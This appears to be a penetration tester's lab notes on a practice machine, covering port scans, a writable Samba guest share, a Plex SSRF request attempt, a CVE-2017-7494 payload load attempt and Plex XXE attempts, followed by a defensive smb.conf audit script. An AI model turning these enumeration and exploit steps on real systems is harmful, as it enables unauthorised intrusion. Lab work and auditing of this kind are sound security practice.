MCO: 66
[pg mco eternalred]
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:90:b3:38:35:a1:44:cf:4b:66:ea:7e:ca:97:07:72 (RSA)
| 256 14:e4:16:6f:95:32:67:13:85:40:21:a7:33:97:a8:4b (ECDSA)
|_ 256 d7:9b:e7:43:e0:75:a0:73:58:20:80:ab:87:00:4f:16 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: COMPUTADORA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h17m48s, deviation: 2h18m34s, median: -2m12s
| nbstat: NetBIOS name: COMPUTADORA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| COMPUTADORA<00> Flags: <unique><active>
| COMPUTADORA<03> Flags: <unique><active>
| COMPUTADORA<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: computadora
| NetBIOS computer name: COMPUTADORA\x00
| Domain name: \x00
| FQDN: computadora
|_ System time: 2020-05-21T21:34:31-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-22T01:34:31
|_ start_date: N/A
smbmap -u '' -p '' -H boron.pg
[+] Guest session   IP: boron.pg:445   Name: unknown
    Disk      Permissions    Comment
    ----      -----------    -------
    print$    NO ACCESS      Printer Drivers
    VIDZ      READ, WRITE
    IPC$      NO ACCESS      IPC Service (computadora server (Samba, Ubuntu))
smbclient \\\\boron.pg\\VIDZ
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 21 18:51:50 2020
.. D 0 Fri Jun 8 12:19:05 2018
ThreeRapidRecoveries.mov N 27551090 Fri Jun 8 10:32:10 2018
revenge.mp4 N 11627238 Fri Jun 8 12:22:08 2018
mad-grapple-skillz+matt-the-whiner.m4v N 15323774 Fri Jun 8 12:21:46 2018
noobChainKill-small.mov N 10887584 Fri Jun 8 10:33:05 2018
lol-grapple-kill.m4v N 2305077 Fri Jun 8 12:21:17 2018
Application Support D 0 Mon Jun 4 20:07:26 2018
7139940 blocks of size 1024. 4816992 blocks available
smb: \>
can’t read the preferences file for ‘plex media server’ in ‘application support’
was looking like smb VIDZ is a dead end, so did nmap allports scan:
Discovered open port 1618/tcp on 172.16.10.66
new port appeared
1618/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
some exploits linked to that but doesn’t look promising.
Discovered open port 32469/tcp on 172.16.10.66
another new port
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
also upnp platinum.
eh… i gotta try harder.
trying harder
…later
trying harder now
sudo mount -t cifs //172.16.10.66/VIDZ ./mnt
[sudo] password for kali:
Password for root@//172.16.10.66/VIDZ:
still no cigar with the smb. not much read/write permissions beyond the root VIDZ directory.
http://boron.pg:32400/web/index.html
https://www.exploit-db.com/exploits/31983
looked promising, but then when i try:
GET /system/proxy HTTP/1.1
Host: boron.pg
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/
Connection: keep-alive
Content-Length: 0
i still get:
Plex is not reachable.
Make sure your server has an internet connection and any firewalls or other programs are set to allow access.
okay i may have something here that deals with samba 4.3.x exploit
smb: \> mkdir hello
smb: \> dir
. D 0 Fri May 22 02:43:21 2020
.. D 0 Fri Jun 8 12:19:05 2018
hello D 0 Fri May 22 02:43:21 2020
https://www.miltonsecurity.com/company/blog/eternalred-cve-2017-7494
writable…
smb: \hello\> put hello.txt
putting file hello.txt as \hello\hello.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \hello\> dir
. D 0 Fri May 22 02:49:14 2020
.. D 0 Fri May 22 02:43:21 2020
hello.txt A 4 Fri May 22 02:49:15 2020
7139940 blocks of size 1024. 4816304 blocks available
hm. getting this error although i can clearly see the file uploaded, and i can ‘get’ the file down to kali
[-] 172.16.10.66:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.16.10.66:445 - Loading the payload from server-side path /var/lib/plexmediaserver/Library/hello/TtvvGrSp.so using /var/lib/plexmediaserver/Library/hello/TtvvGrSp.so...
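From the defender's side, the conditions these notes rely on (a share writable by guest, SMB signing not required, the CVE-2017-7494 angle) can be checked in smb.conf. This is an added example, not part of the original notes: the sample configuration is constructed, and `nt pipe support = no` is the workaround given in the Samba advisory for CVE-2017-7494.

```python
import configparser

# Constructed smb.conf: the share name VIDZ comes from the notes above; the
# path and every setting are assumptions chosen to match the scan results.
SAMPLE_CONF = """
[global]
    workgroup = WORKGROUP
    map to guest = Bad User
    server signing = auto
[VIDZ]
    path = /srv/vidz
    guest ok = yes
    read only = no
"""
TRUE = {"yes", "true", "1", "on"}
# (parameter, inverted) synonyms smb.conf accepts for the two share flags
GUEST = [("guest ok", False), ("public", False)]
WRITE = [("read only", True), ("writable", False), ("writeable", False), ("write ok", False)]

def flag(section, synonyms, default):
    """Boolean value of the first synonym present in the section."""
    for name, inverted in synonyms:
        if name in section:
            return (section[name].strip().lower() in TRUE) != inverted
    return default

def audit(conf_text):
    """Return findings (list of strings) for an smb.conf passed as text."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    # Strip indentation so configparser does not read it as line continuation.
    cp.read_string("\n".join(line.strip() for line in conf_text.splitlines()))
    sections = {name.lower(): cp[name] for name in cp.sections()}
    glob = sections.pop("global", {})
    findings = []
    # Samba defaults: nt pipe support = yes, read only = yes, guest ok = no.
    if flag(glob, [("nt pipe support", False)], True):
        findings.append("global: nt pipe support enabled (CVE-2017-7494 workaround absent)")
    if glob.get("server signing", "default").strip().lower() not in {"mandatory", "required"}:
        findings.append("global: SMB signing not required")
    for name, sec in sections.items():
        if flag(sec, GUEST, False) and flag(sec, WRITE, False):
            findings.append(f"{name}: writable by guest")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF):
        print(finding)
```

Disabling `nt pipe support` can break functionality some Windows clients expect, so it is a stopgap until the Samba package is patched.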
back to the plex: 1.13.0.5023-31d3c0c65 from GET /identity request
following https://www.exploit-db.com/exploits/45146
tried the ssdp way:
[XML REQUEST] Host: 172.16.10.66, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 172.16.10.66, User-Agent: None
GET /ssdp/xxe.html
but didn’t get anything back on my netcat / smbserver.
to try: xxe exfil